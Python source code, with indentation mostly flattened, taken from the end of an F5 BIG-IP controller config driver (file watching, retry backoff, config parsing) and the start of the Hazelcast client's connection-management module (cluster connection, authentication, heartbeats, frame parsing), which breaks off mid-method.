mgr.get_schema_type() == 'ltm':
tmp = 0
tmp = _create_custom_profiles(
mgr.mgmt_root(),
partition,
cfg_ltm['customProfiles'])
incomplete += tmp
# Apply the BIG-IP config after creating profiles
# and before deleting profiles
if mgr.get_schema_type() == 'net':
incomplete += mgr._apply_net_config(cfg_net)
else:
incomplete += mgr._apply_ltm_config(cfg_ltm)
# Manually delete custom profiles (if needed)
if mgr.get_schema_type() == 'ltm':
_delete_unused_ssl_profiles(
mgr,
partition,
cfg_ltm)
except F5CcclError as e:
# We created an invalid configuration, raise the
# exception and fail
log.error("CCCL Error: %s", e.msg)
incomplete += 1
return incomplete
def cleanup_backoff(self):
"""Cleans up canceled backoff timers."""
self._backoff_timer.cancel()
self._backoff_timer.join()
self._backoff_timer = None
def handle_backoff(self):
"""Wrapper for calls to retry_backoff."""
if (self._interval and self._interval.is_running() is
True):
self._interval.stop()
if self._backoff_timer is None:
self.retry_backoff()
def retry_backoff(self):
"""Add a backoff timer to retry in case of failure."""
def timer_cb():
self._backoff_timer = None
self.notify_reset()
self._backoff_timer = threading.Timer(
self._backoff_time, timer_cb
)
log.error("Error applying config, will try again in %s seconds",
self._backoff_time)
self._backoff_timer.start()
if self._backoff_time < self._max_backoff_time:
self._backoff_time *= 2
class ConfigWatcher(pyinotify.ProcessEvent):
def __init__(self, config_file, on_change):
basename = os.path.basename(config_file)
if not basename or 0 == len(basename):
raise ConfigError('config_file must be a file path')
self._config_file = config_file
self._on_change = on_change
self._config_dir = os.path.dirname(self._config_file)
self._config_stats = None
if os.path.exists(self._config_file):
try:
self._config_stats = self._digest()
except IOError as ioe:
log.warning('ioerror during sha sum calculation: {}'.
format(ioe))
self._running = False
self._polling = False
self._user_abort = False
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
self._user_abort = True
self._running = False
def _loop_check(self, notifier):
if self._polling:
log.debug('inotify loop ended - returning to polling mode')
return True
else:
return False
def loop(self):
self._running = True
if not os.path.exists(self._config_dir):
log.info(
'configured directory doesn\'t exist {}, entering poll loop'.
format(self._config_dir))
self._polling = True
while self._running:
try:
while self._polling:
if self._polling:
if os.path.exists(self._config_dir):
log.debug('found watchable directory - {}'.format(
self._config_dir))
self._polling = False
break
else:
log.debug('waiting for watchable directory - {}'.
format(self._config_dir))
time.sleep(1)
_wm = pyinotify.WatchManager()
_notifier = pyinotify.Notifier(_wm, default_proc_fun=self)
_notifier.coalesce_events(True)
mask = (pyinotify.IN_CREATE | pyinotify.IN_DELETE |
pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO |
pyinotify.IN_CLOSE_WRITE | pyinotify.IN_MOVE_SELF |
pyinotify.IN_DELETE_SELF)
_wm.add_watch(
path=self._config_dir,
mask=mask,
quiet=False,
exclude_filter=lambda path: False)
log.info('entering inotify loop to watch {}'.format(
self._config_file))
_notifier.loop(callback=self._loop_check)
if (not self._polling and _notifier._fd is None):
log.info('terminating')
self._running = False
except Exception as e:
log.warning(e)
if self._user_abort:
log.info('Received user kill signal, terminating.')
def _digest(self):
sha = hashlib.sha256()
with open(self._config_file, 'rb') as f:
fcntl.lockf(f.fileno(), fcntl.LOCK_SH, 0, 0, 0)
while True:
buf = f.read(4096)
if not buf:
break
sha.update(buf)
fcntl.lockf(f.fileno(), fcntl.LOCK_UN, 0, 0, 0)
return sha.digest()
def _should_watch(self, pathname):
if pathname == self._config_file:
return True
return False
def _is_changed(self):
changed = False
cur_hash = None
if not os.path.exists(self._config_file):
if cur_hash != self._config_stats:
changed = True
else:
changed = False
else:
try:
cur_hash = self._digest()
if cur_hash != self._config_stats:
changed = True
else:
changed = False
except IOError as ioe:
log.warning('ioerror during sha sum calculation: {}'.
format(ioe))
return (changed, cur_hash)
def process_default(self, event):
if (pyinotify.IN_DELETE_SELF == event.mask or
pyinotify.IN_MOVE_SELF == event.mask):
log.warn(
'watchpoint {} has been moved or destroyed, using poll loop'.
format(self._config_dir))
self._polling = True
if self._config_stats is not None:
log.debug('config file {} changed, parent gone'.format(
self._config_file))
self._config_stats = None
self._on_change()
if self._should_watch(event.pathname):
(changed, sha) = self._is_changed()
if changed:
                log.debug('config file {} changed - signalling bigip'.format(
                    self._config_file))
self._config_stats = sha
self._on_change()
def _parse_config(config_file):
def _file_exist_cb(log_success):
if os.path.exists(config_file):
if log_success:
log.info('Config file: {} found'.format(config_file))
return (True, None)
else:
return (False, 'Waiting for config file {}'.format(config_file))
_retry_backoff(_file_exist_cb)
with open(config_file, 'r') as config:
fcntl.lockf(config.fileno(), fcntl.LOCK_SH, 0, 0, 0)
data = config.read()
fcntl.lockf(config.fileno(), fcntl.LOCK_UN, 0, 0, 0)
config_json = json.loads(data)
log.debug('loaded configuration file successfully')
return config_json
def _handle_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--config-file',
type=str,
required=True,
help='BigIp configuration file')
parser.add_argument(
'--ctlr-prefix',
type=str,
required=True,
help='Controller name prefix'
)
args = parser.parse_args()
basename = os.path.basename(args.config_file)
if not basename or 0 == len(basename):
raise ConfigError('must provide a file path')
args.config_file = os.path.realpath(args.config_file)
return args
def _handle_global_config(config):
level = DEFAULT_LOG_LEVEL
verify_interval = DEFAULT_VERIFY_INTERVAL
if config and 'global' in config:
global_cfg = config['global']
if 'log-level' in global_cfg:
log_level = global_cfg['log-level']
try:
level = logging.getLevelName(log_level.upper())
except (AttributeError):
log.warn('The "global:log-level" field in the configuration '
'file should be a string')
if 'verify-interval' in global_cfg:
try:
verify_interval = float(global_cfg['verify-interval'])
if verify_interval < 0:
verify_interval = DEFAULT_VERIFY_INTERVAL
log.warn('The "global:verify-interval" field in the '
'configuration file should be a non-negative '
'number')
except (ValueError):
log.warn('The "global:verify-interval" field in the '
'configuration file should be a number')
vxlan_partition = global_cfg.get('vxlan-partition')
try:
root_logger.setLevel(level)
if level > logging.DEBUG:
logging.getLogger('requests.packages.urllib3.'
'connectionpool').setLevel(logging.WARNING)
except:
level = DEFAULT_LOG_LEVEL
root_logger.setLevel(level)
if level > logging.DEBUG:
logging.getLogger('requests.packages.urllib3.'
'connectionpool').setLevel(logging.WARNING)
log.warn('Undefined value specified for the '
'"global:log-level" field in the configuration file')
# level only is needed for unit tests
return verify_interval, level, vxlan_partition
def _handle_bigip_config(config):
if (not config) or ('bigip' not in config):
raise ConfigError('Configuration file missing "bigip" section')
bigip = config['bigip']
if 'username' not in bigip:
raise ConfigError('Configuration file missing '
'"bigip:username" section')
if 'password' not in bigip:
raise ConfigError('Configuration file missing '
'"bigip:password" section')
if 'url' not in bigip:
raise ConfigError('Configuration file missing "bigip:url" section')
if ('partitions' not in bigip) or (len(bigip['partitions']) == 0):
raise ConfigError('Configuration file must specify at least one '
'partition in the "bigip:partitions" section')
url = urlparse(bigip['url'])
host = url.hostname
port = url.port
if not port:
port = 443
return host, port
def _handle_vxlan_config(config):
if config and 'vxlan-fdb' in config:
fdb = config['vxlan-fdb']
if 'name' not in fdb:
raise ConfigError('Configuration file missing '
'"vxlan-fdb:name" section')
if 'records' not in fdb:
raise ConfigError('Configuration file missing '
'"vxlan-fdb:records" section')
if config and 'vxlan-arp' in config:
arp = config['vxlan-arp']
if 'arps' not in arp:
raise ConfigError('Configuration file missing '
'"vxlan-arp:arps" section')
def _set_user_agent(prefix):
try:
with open('/app/vendor/src/f5/VERSION_BUILD.json', 'r') \
as version_file:
data = json.load(version_file)
user_agent = \
prefix + "-bigip-ctlr-" + data['version'] + '-' + data['build']
except Exception as e:
user_agent = prefix + "-bigip-ctlr-VERSION-UNKNOWN"
log.error("Could not read version file: %s", e)
return user_agent
def _retry_backoff(cb):
RETRY_INTERVAL = 1
log_interval = 0.5
elapsed = 0.5
log_success = False
while 1:
if log_interval > 0.5:
log_success = True
(success, val) = cb(log_success)
if success:
return val
if elapsed == log_interval:
elapsed = 0
log_interval *= 2
log.error("Encountered error: {}. Retrying for {} seconds.".format(
val, int(log_interval)
))
time.sleep(RETRY_INTERVAL)
elapsed += RETRY_INTERVAL
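# A minimal usage sketch for _retry_backoff (the callback and marker file below are
# hypothetical; compare _file_exist_cb in _parse_config above). The callback returns
# (success, value); it is retried once per second and the failure message is logged
# at roughly doubling intervals.
def _example_wait_for_marker(path):
    def _cb(log_success):
        if os.path.exists(path):
            if log_success:
                log.info('Marker file {} found'.format(path))
            return (True, path)
        return (False, 'Waiting for marker file {}'.format(path))
    return _retry_backoff(_cb)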
def _find_net_schema():
paths = [path for path in sys.path if 'site-packages' in path]
for path in paths:
for root, dirs, files in os.walk(path):
if NET_SCHEMA_NAME in files:
return os.path.join(root, NET_SCHEMA_NAME)
for root, dirs, files in os.walk('/app/src/f5-cccl'):
if NET_SCHEMA_NAME in files:
return os.path.join(root, NET_SCHEMA_NAME)
log.info('Could not find CCCL schema: {}'.format(NET_SCHEMA_NAME))
return ''
def _is_ltm_disabled(config):
try:
return config['global']['disable-ltm']
except KeyError:
return False
def main():
try:
args = _handle_args()
config = _parse_config(args.config_file)
verify_interval, _, vxlan_partition = _handle_global_config(config)
host, port = _handle_bigip_config(config)
# FIXME (kenr): Big-IP settings are currently static (we ignore any
# changes to these fields in subsequent updates). We
# may want to make the changes dynamic in the future.
# BIG-IP to manage
def _bigip_connect_cb(log_success):
try:
bigip = mgmt_root(
host,
config['bigip']['username'],
config['bigip']['password'],
port,
"tmos")
if log_success:
log.info('BIG-IP connection established.')
return (True, bigip)
except Exception as e:
return (False, 'BIG-IP connection error: {}'.format(e))
bigip = _retry_backoff(_bigip_connect_cb)
# Read version and build info, set user-agent for ICR session
user_agent = _set_user_agent(args.ctlr_prefix)
managers = []
if not _is_ltm_disabled(config):
for partition in config['bigip']['partitions']:
# Management for the BIG-IP partitions
manager = CloudServiceManager(
bigip,
partition,
user_agent=user_agent)
managers.append(manager)
if vxlan_partition:
# Management for net resources (VXLAN)
manager = CloudServiceManager(
bigip,
vxlan_partition,
user_agent=user_agent,
prefix=args.ctlr_prefix,
schema_path=_find_net_schema())
managers.append(manager)
handler = ConfigHandler(args.config_file,
managers,
verify_interval)
if os.path.exists(args.config_file):
handler.notify_reset()
watcher = ConfigWatcher(args.config_file, handler.notify_reset)
watcher.loop()
handler.stop()
except (IOError, ValueError, ConfigError) as e:
log.error(e)
sys.exit(1)
except Exception:
log.exception('Unexpected error')
sys.exit(1)
return 0
if __name__ == "__main__":
main()
|
connection.py
|
import io
import logging
import random
import struct
import threading
import time
import uuid
from hazelcast import six, __version__
from hazelcast.config import ReconnectMode
from hazelcast.core import AddressHelper, CLIENT_TYPE, SERIALIZATION_VERSION
from hazelcast.errors import (
AuthenticationError,
TargetDisconnectedError,
HazelcastClientNotActiveError,
InvalidConfigurationError,
ClientNotAllowedInClusterError,
IllegalStateError,
ClientOfflineError,
)
from hazelcast.future import ImmediateFuture, ImmediateExceptionFuture
from hazelcast.invocation import Invocation
from hazelcast.lifecycle import LifecycleState
from hazelcast.protocol.client_message import (
SIZE_OF_FRAME_LENGTH_AND_FLAGS,
Frame,
InboundMessage,
ClientMessageBuilder,
)
from hazelcast.protocol.codec import client_authentication_codec, client_ping_codec
from hazelcast.util import AtomicInteger, calculate_version, UNKNOWN_VERSION
_logger = logging.getLogger(__name__)
_INF = float("inf")
class _WaitStrategy(object):
def __init__(self, initial_backoff, max_backoff, multiplier, cluster_connect_timeout, jitter):
self._initial_backoff = initial_backoff
self._max_backoff = max_backoff
self._multiplier = multiplier
self._cluster_connect_timeout = cluster_connect_timeout
self._jitter = jitter
self._attempt = None
self._cluster_connect_attempt_begin = None
self._current_backoff = None
if cluster_connect_timeout == _INF:
self._cluster_connect_timeout_text = "INFINITE"
else:
self._cluster_connect_timeout_text = "%.2fs" % self._cluster_connect_timeout
def reset(self):
self._attempt = 0
self._cluster_connect_attempt_begin = time.time()
self._current_backoff = min(self._max_backoff, self._initial_backoff)
def sleep(self):
self._attempt += 1
time_passed = time.time() - self._cluster_connect_attempt_begin
if time_passed > self._cluster_connect_timeout:
_logger.warning(
"Unable to get live cluster connection, cluster connect timeout (%s) is reached. "
"Attempt %d.",
self._cluster_connect_timeout_text,
self._attempt,
)
return False
# random between (-jitter * current_backoff, jitter * current_backoff)
sleep_time = self._current_backoff + self._current_backoff * self._jitter * (
2 * random.random() - 1
)
sleep_time = min(sleep_time, self._cluster_connect_timeout - time_passed)
_logger.warning(
"Unable to get live cluster connection, retry in %.2fs, attempt: %d, "
"cluster connect timeout: %s, max backoff: %.2fs",
sleep_time,
self._attempt,
self._cluster_connect_timeout_text,
self._max_backoff,
)
time.sleep(sleep_time)
self._current_backoff = min(self._current_backoff * self._multiplier, self._max_backoff)
return True
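# Illustrative, standalone sketch of the backoff arithmetic used in _WaitStrategy.sleep
# above (not part of the client; the parameter values are hypothetical). Each step
# sleeps around the current backoff, spread by +/- jitter, then multiplies the backoff
# up to the configured maximum.
def _example_backoff_schedule(initial=1.0, maximum=30.0, multiplier=2.0, jitter=0.2, attempts=5):
    backoff = min(maximum, initial)
    schedule = []
    for _ in range(attempts):
        schedule.append(backoff + backoff * jitter * (2 * random.random() - 1))
        backoff = min(backoff * multiplier, maximum)
    return schedule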
class _AuthenticationStatus(object):
AUTHENTICATED = 0
CREDENTIALS_FAILED = 1
SERIALIZATION_VERSION_MISMATCH = 2
NOT_ALLOWED_IN_CLUSTER = 3
class ConnectionManager(object):
"""ConnectionManager is responsible for managing ``Connection`` objects."""
def __init__(
self,
client,
config,
reactor,
address_provider,
lifecycle_service,
partition_service,
cluster_service,
invocation_service,
near_cache_manager,
):
self.live = False
self.active_connections = {} # uuid to connection, must be modified under the _lock
self.client_uuid = uuid.uuid4()
self._client = client
self._config = config
self._reactor = reactor
self._address_provider = address_provider
self._lifecycle_service = lifecycle_service
self._partition_service = partition_service
self._cluster_service = cluster_service
self._invocation_service = invocation_service
self._near_cache_manager = near_cache_manager
self._smart_routing_enabled = config.smart_routing
self._wait_strategy = self._init_wait_strategy(config)
self._reconnect_mode = config.reconnect_mode
self._heartbeat_manager = _HeartbeatManager(
self, self._client, config, reactor, invocation_service
)
self._connection_listeners = []
self._connect_all_members_timer = None
self._async_start = config.async_start
self._connect_to_cluster_thread_running = False
self._shuffle_member_list = config.shuffle_member_list
self._lock = threading.RLock()
self._connection_id_generator = AtomicInteger()
self._labels = frozenset(config.labels)
self._cluster_id = None
self._load_balancer = None
def add_listener(self, on_connection_opened=None, on_connection_closed=None):
"""Registers a ConnectionListener.
If the same listener is registered multiple times, it will be notified multiple times.
Args:
on_connection_opened (function): Function to be called when a connection is opened. (Default value = None)
on_connection_closed (function): Function to be called when a connection is removed. (Default value = None)
"""
self._connection_listeners.append((on_connection_opened, on_connection_closed))
def get_connection(self, member_uuid):
return self.active_connections.get(member_uuid, None)
def get_random_connection(self, should_get_data_member=False):
if self._smart_routing_enabled:
connection = self._get_connection_from_load_balancer(should_get_data_member)
if connection:
return connection
# We should not get to this point under normal circumstances
# for the smart client. For uni-socket client, there would be
# a single connection in the dict. Therefore, copying the list
# should be acceptable.
for member_uuid, connection in list(six.iteritems(self.active_connections)):
if should_get_data_member:
member = self._cluster_service.get_member(member_uuid)
if not member or member.lite_member:
continue
return connection
return None
def start(self, load_balancer):
if self.live:
return
self.live = True
self._load_balancer = load_balancer
self._heartbeat_manager.start()
self._connect_to_cluster()
def shutdown(self):
if not self.live:
return
self.live = False
if self._connect_all_members_timer:
self._connect_all_members_timer.cancel()
self._heartbeat_manager.shutdown()
# Need to create copy of connection values to avoid modification errors on runtime
for connection in list(six.itervalues(self.active_connections)):
connection.close("Hazelcast client is shutting down", None)
self.active_connections.clear()
del self._connection_listeners[:]
def connect_to_all_cluster_members(self, sync_start):
if not self._smart_routing_enabled:
return
if sync_start:
for member in self._cluster_service.get_members():
try:
self._get_or_connect_to_member(member).result()
except:
pass
self._start_connect_all_members_timer()
def on_connection_close(self, closed_connection):
remote_uuid = closed_connection.remote_uuid
remote_address = closed_connection.remote_address
if not remote_address:
_logger.debug(
"Destroying %s, but it has no remote address, hence nothing is "
"removed from the connection dictionary",
closed_connection,
)
return
with self._lock:
connection = self.active_connections.get(remote_uuid, None)
disconnected = False
removed = False
if connection == closed_connection:
self.active_connections.pop(remote_uuid, None)
removed = True
_logger.info(
"Removed connection to %s:%s, connection: %s",
remote_address,
remote_uuid,
connection,
)
if not self.active_connections:
disconnected = True
if disconnected:
self._lifecycle_service.fire_lifecycle_event(LifecycleState.DISCONNECTED)
self._trigger_cluster_reconnection()
if removed:
for _, on_connection_closed in self._connection_listeners:
if on_connection_closed:
try:
on_connection_closed(closed_connection)
except:
_logger.exception("Exception in connection listener")
else:
_logger.debug(
"Destroying %s, but there is no mapping for %s in the connection dictionary",
closed_connection,
remote_uuid,
)
def check_invocation_allowed(self):
if self.active_connections:
return
if self._async_start or self._reconnect_mode == ReconnectMode.ASYNC:
raise ClientOfflineError()
else:
raise IOError("No connection found to cluster")
def _get_connection_from_load_balancer(self, should_get_data_member):
load_balancer = self._load_balancer
member = None
if should_get_data_member:
if load_balancer.can_get_next_data_member():
member = load_balancer.next_data_member()
else:
member = load_balancer.next()
if not member:
return None
return self.get_connection(member.uuid)
def _get_or_connect_to_address(self, address):
for connection in list(six.itervalues(self.active_connections)):
if connection.remote_address == address:
return ImmediateFuture(connection)
try:
translated = self._translate(address)
connection = self._create_connection(translated)
return self._authenticate(connection).continue_with(self._on_auth, connection)
except Exception as e:
return ImmediateExceptionFuture(e)
def _get_or_connect_to_member(self, member):
connection = self.active_connections.get(member.uuid, None)
if connection:
return ImmediateFuture(connection)
try:
translated = self._translate(member.address)
connection = self._create_connection(translated)
return self._authenticate(connection).continue_with(self._on_auth, connection)
except Exception as e:
return ImmediateExceptionFuture(e)
def _create_connection(self, address):
factory = self._reactor.connection_factory
return factory(
self,
self._connection_id_generator.get_and_increment(),
address,
self._config,
self._invocation_service.handle_client_message,
)
def _translate(self, address):
translated = self._address_provider.translate(address)
if not translated:
raise ValueError(
"Address provider %s could not translate address %s"
% (self._address_provider.__class__.__name__, address)
)
return translated
def _trigger_cluster_reconnection(self):
if self._reconnect_mode == ReconnectMode.OFF:
_logger.info("Reconnect mode is OFF. Shutting down the client")
self._shutdown_client()
return
if self._lifecycle_service.running:
self._start_connect_to_cluster_thread()
def _init_wait_strategy(self, config):
cluster_connect_timeout = config.cluster_connect_timeout
if cluster_connect_timeout == -1:
            # If no timeout is specified by the
# user, or set to -1 explicitly, set
# the timeout to infinite.
cluster_connect_timeout = _INF
return _WaitStrategy(
config.retry_initial_backoff,
config.retry_max_backoff,
config.retry_multiplier,
cluster_connect_timeout,
config.retry_jitter,
)
def _start_connect_all_members_timer(self):
connecting_uuids = set()
def run():
if not self._lifecycle_service.running:
return
for member in self._cluster_service.get_members():
member_uuid = member.uuid
if self.active_connections.get(member_uuid, None):
continue
if member_uuid in connecting_uuids:
continue
connecting_uuids.add(member_uuid)
if not self._lifecycle_service.running:
break
# Bind the bound_member_uuid to the value
# in this loop iteration
def cb(_, bound_member_uuid=member_uuid):
connecting_uuids.discard(bound_member_uuid)
self._get_or_connect_to_member(member).add_done_callback(cb)
self._connect_all_members_timer = self._reactor.add_timer(1, run)
self._connect_all_members_timer = self._reactor.add_timer(1, run)
def _connect_to_cluster(self):
if self._async_start:
self._start_connect_to_cluster_thread()
else:
self._sync_connect_to_cluster()
def _start_connect_to_cluster_thread(self):
with self._lock:
if self._connect_to_cluster_thread_running:
return
self._connect_to_cluster_thread_running = True
def run():
try:
while True:
self._sync_connect_to_cluster()
with self._lock:
if self.active_connections:
self._connect_to_cluster_thread_running = False
return
except:
_logger.exception("Could not connect to any cluster, shutting down the client")
self._shutdown_client()
t = threading.Thread(target=run, name="hazelcast_async_connection")
t.daemon = True
t.start()
def _shutdown_client(self):
try:
self._client.shutdown()
except:
_logger.exception("Exception during client shutdown")
def _sync_connect_to_cluster(self):
tried_addresses = set()
self._wait_strategy.reset()
try:
while True:
tried_addresses_per_attempt = set()
members = self._cluster_service.get_members()
if self._shuffle_member_list:
random.shuffle(members)
for member in members:
self._check_client_active()
tried_addresses_per_attempt.add(member.address)
connection = self._connect(member, self._get_or_connect_to_member)
if connection:
return
for address in self._get_possible_addresses():
self._check_client_active()
if address in tried_addresses_per_attempt:
                        # We already tried this address from the member list
continue
tried_addresses_per_attempt.add(address)
connection = self._connect(address, self._get_or_connect_to_address)
if connection:
return
tried_addresses.update(tried_addresses_per_attempt)
# If the address providers load no addresses (which seems to be possible),
# then the above loop is not entered and the lifecycle check is missing,
# hence we need to repeat the same check at this point.
if not tried_addresses_per_attempt:
self._check_client_active()
if not self._wait_strategy.sleep():
break
except (ClientNotAllowedInClusterError, InvalidConfigurationError):
cluster_name = self._config.cluster_name
_logger.exception("Stopped trying on cluster %s", cluster_name)
cluster_name = self._config.cluster_name
_logger.info(
"Unable to connect to any address from the cluster with name: %s. "
"The following addresses were tried: %s",
cluster_name,
tried_addresses,
)
if self._lifecycle_service.running:
msg = "Unable to connect to any cluster"
else:
msg = "Client is being shutdown"
raise IllegalStateError(msg)
def _connect(self, target, get_or_connect_func):
_logger.info("Trying to connect to %s", target)
try:
return get_or_connect_func(target).result()
except (ClientNotAllowedInClusterError, InvalidConfigurationError) as e:
_logger.warning("Error during initial connection to %s", target, exc_info=True)
raise e
except:
_logger.warning("Error during initial connection to %s", target, exc_info=True)
return None
def _authenticate(self, connection):
client = self._client
cluster_name = self._config.cluster_name
client_name = client.name
request = client_authentication_codec.encode_request(
cluster_name,
None,
None,
self.client_uuid,
CLIENT_TYPE,
SERIALIZATION_VERSION,
__version__,
client_name,
self._labels,
)
invocation = Invocation(
request, connection=connection, urgent=True, response_handler=lambda m: m
)
self._invocation_service.invoke(invocation)
return invocation.future
def _on_auth(self, response, connection):
try:
response = client_authentication_codec.decode_response(response.result())
except Exception as err:
connection.close("Failed to authenticate connection", err)
raise err
status = response["status"]
if status == _AuthenticationStatus.AUTHENTICATED:
return self._handle_successful_auth(response, connection)
if status == _AuthenticationStatus.CREDENTIALS_FAILED:
err = AuthenticationError(
"Authentication failed. The configured cluster name on "
"the client does not match the one configured in the cluster."
)
elif status == _AuthenticationStatus.NOT_ALLOWED_IN_CLUSTER:
err = ClientNotAllowedInClusterError("Client is not allowed in the cluster")
elif status == _AuthenticationStatus.SERIALIZATION_VERSION_MISMATCH:
err = IllegalStateError("Server serialization version does not match to client")
else:
err = AuthenticationError(
"Authentication status code not supported. status: %s" % status
)
connection.close("Failed to authenticate connection", err)
raise err
def _handle_successful_auth(self, response, connection):
with self._lock:
self._check_partition_count(response["partition_count"])
server_version_str = response["server_hazelcast_version"]
remote_address = response["address"]
remote_uuid = response["member_uuid"]
connection.remote_address = remote_address
connection.server_version = calculate_version(server_version_str)
connection.remote_uuid = remote_uuid
existing = self.active_connections.get(remote_uuid, None)
if existing:
connection.close(
"Duplicate connection to same member with UUID: %s" % remote_uuid, None
)
return existing
new_cluster_id = response["cluster_id"]
changed_cluster = self._cluster_id is not None and self._cluster_id != new_cluster_id
if changed_cluster:
self._check_client_state_on_cluster_change(connection)
_logger.warning(
"Switching from current cluster: %s to new cluster: %s",
self._cluster_id,
new_cluster_id,
)
self._on_cluster_restart()
is_initial_connection = not self.active_connections
self.active_connections[remote_uuid] = connection
if is_initial_connection:
self._cluster_id = new_cluster_id
if is_initial_connection:
self._lifecycle_service.fire_lifecycle_event(LifecycleState.CONNECTED)
_logger.info(
"Authenticated with server %s:%s, server version: %s, local address: %s",
remote_address,
remote_uuid,
server_version_str,
connection.local_address,
)
for on_connection_opened, _ in self._connection_listeners:
if on_connection_opened:
try:
on_connection_opened(connection)
except:
_logger.exception("Exception in connection listener")
if not connection.live:
self.on_connection_close(connection)
return connection
def _check_client_state_on_cluster_change(self, connection):
if self.active_connections:
# If there are other connections, we must be connected to the wrong cluster.
# We should not stay connected to this new connection.
# Note that, in some racy scenarios, we might close a connection that
# we can operate on. In those scenarios, we rely on the fact that we will
# reopen the connections.
reason = "Connection does not belong to the cluster %s" % self._cluster_id
connection.close(reason, None)
raise ValueError(reason)
def _on_cluster_restart(self):
self._near_cache_manager.clear_near_caches()
self._cluster_service.clear_member_list()
def _check_partition_count(self, partition_count):
if not self._partition_service.check_and_set_partition_count(partition_count):
raise ClientNotAllowedInClusterError(
"Client can not work with this cluster because it has a "
"different partition count. Expected partition count: %d, "
"Member partition count: %d"
% (self._partition_service.partition_count, partition_count)
)
def _check_client_active(self):
if not self._lifecycle_service.running:
raise HazelcastClientNotActiveError()
def _get_possible_addresses(self):
primaries, secondaries = self._address_provider.load_addresses()
if self._shuffle_member_list:
# The relative order between primary and secondary addresses should
# not be changed. So we shuffle the lists separately and then add
# them to the final list so that secondary addresses are not tried
# before all primary addresses have been tried. Otherwise we can get
# startup delays
random.shuffle(primaries)
random.shuffle(secondaries)
addresses = []
addresses.extend(primaries)
addresses.extend(secondaries)
return addresses
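# Standalone illustration of the shuffling policy described in the comment above
# (not part of the client): primaries and secondaries are shuffled independently,
# so every primary address is still tried before any secondary one.
def _example_shuffle_addresses(primaries, secondaries):
    primaries, secondaries = list(primaries), list(secondaries)
    random.shuffle(primaries)
    random.shuffle(secondaries)
    return primaries + secondaries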
class _HeartbeatManager(object):
_heartbeat_timer = None
def __init__(self, connection_manager, client, config, reactor, invocation_service):
self._connection_manager = connection_manager
self._client = client
self._reactor = reactor
self._invocation_service = invocation_service
self._heartbeat_timeout = config.heartbeat_timeout
self._heartbeat_interval = config.heartbeat_interval
def start(self):
"""Starts sending periodic HeartBeat operations."""
def _heartbeat():
conn_manager = self._connection_manager
if not conn_manager.live:
return
now = time.time()
for connection in list(six.itervalues(conn_manager.active_connections)):
self._check_connection(now, connection)
self._heartbeat_timer = self._reactor.add_timer(self._heartbeat_interval, _heartbeat)
self._heartbeat_timer = self._reactor.add_timer(self._heartbeat_interval, _heartbeat)
def shutdown(self):
"""Stops HeartBeat operations."""
if self._heartbeat_timer:
self._heartbeat_timer.cancel()
def _check_connection(self, now, connection):
if not connection.live:
return
if (now - connection.last_read_time) > self._heartbeat_timeout:
_logger.warning("Heartbeat failed over the connection: %s", connection)
connection.close(
"Heartbeat timed out",
TargetDisconnectedError("Heartbeat timed out to connection %s" % connection),
)
return
if (now - connection.last_write_time) > self._heartbeat_interval:
request = client_ping_codec.encode_request()
invocation = Invocation(request, connection=connection, urgent=True)
self._invocation_service.invoke(invocation)
_frame_header = struct.Struct("<iH")
class _Reader(object):
def __init__(self, builder):
self._buf = io.BytesIO()
self._builder = builder
self._bytes_read = 0
self._bytes_written = 0
# Size of the frame excluding the header (SIZE_OF_FRAME_LENGTH_AND_FLAGS bytes)
self._frame_size = -1
self._frame_flags = 0
self._message = None
def read(self, data):
self._buf.seek(self._bytes_written)
self._buf.write(data)
self._bytes_written += len(data)
def process(self):
message = self._read_message()
while message:
self._builder.on_message(message)
message = self._read_message()
def _read_message(self):
while True:
if self._read_frame():
if self._message.end_frame.is_final_frame():
msg = self._message
self._reset()
return msg
else:
return None
def _read_frame(self):
if self._frame_size == -1:
if self.length < SIZE_OF_FRAME_LENGTH_AND_FLAGS:
                # we don't even have the frame length and flags yet
return False
self._read_frame_size_and_flags()
if self.length < self._frame_size:
return False
self._buf.seek(self._bytes_read)
size = self._frame_size
data = self._buf.read(size)
self._bytes_read += size
self._frame_size = -1
# No need to reset flags since it will be overwritten on the next read_frame_size_and_flags call
frame = Frame(data, self._frame_flags)
if not self._message:
self._message = InboundMessage(frame)
else:
self._message.add_frame(frame)
return True
def _read_frame_size_and_flags(self):
self._buf.seek(self._bytes_read)
header_data = self._buf.read(SIZE_OF_FRAME_LENGTH_AND_FLAGS)
self._frame_size, self._frame_flags = _frame_header.unpack_from(header_data, 0)
self._frame_size -= SIZE_OF_FRAME_LENGTH_AND_FLAGS
self._bytes_read += SIZE_OF_FRAME_LENGTH_AND_FLAGS
def _reset(self):
if self._bytes_written == self._bytes_read:
self._buf.seek(0)
self._buf.truncate()
self._bytes_written = 0
self._bytes_read = 0
self._message = None
@property
def length(self):
return self._bytes_written - self._bytes_read
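# Illustrative sketch (not part of the client) of how a frame header built with
# _frame_header ("<iH": little-endian frame length followed by flags) relates to what
# _read_frame_size_and_flags recovers. The flag value 0 is arbitrary here.
def _example_frame_header_roundtrip(payload):
    header = _frame_header.pack(SIZE_OF_FRAME_LENGTH_AND_FLAGS + len(payload), 0)
    size, _flags = _frame_header.unpack_from(header, 0)
    # the on-wire size includes the header itself, so the reader subtracts it
    return size - SIZE_OF_FRAME_LENGTH_AND_FLAGS == len(payload)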
class Connection(object):
"""Connection object which stores connection related information and operations."""
def __init__(self, connection_manager, connection_id, message_callback):
self.remote_address = None
self.remote_uuid = None
self.connected_address = None
self.local_address = None
self.last_read_time = 0
self.last_write_time = 0
self.start_time = 0
self.server_version = UNKNOWN_VERSION
self.live = True
self.close_reason = None
self._connection_manager = connection_manager
self._id = connection_id
self._builder = ClientMessageBuilder(message_callback)
self._reader = _Reader(self._builder)
def send_message(self, message):
"""Sends a message to this connection.
Args:
message (hazelcast.protocol.client_message.OutboundMessage): Message to be sent to this connection.
Returns:
bool: ``True`` if the message is written to the socket, ``False`` otherwise.
"""
if not self.live:
return False
self._write(message.buf)
return True
def close(self, reason, cause):
"""Closes the connection.
Args:
reason (str): The reason this connection is going to be closed. Is allowed to be None.
cause (Exception): The exception responsible for closing this connection. Is allowed to be None.
"""
if not self.live:
return
self.live = False
self.close_reason = reason
self._log_close(reason, cause)
try:
self._inner_close()
except:
_logger.exception("Error while closing the the connection %s", self)
self._connection_manager.on_connection_close(self)
def _log_close(self, reason, cause):
msg = "%s closed. Reason: %s"
if reason:
r = reason
elif cause:
r = cause
else:
r = "Socket explicitly closed"
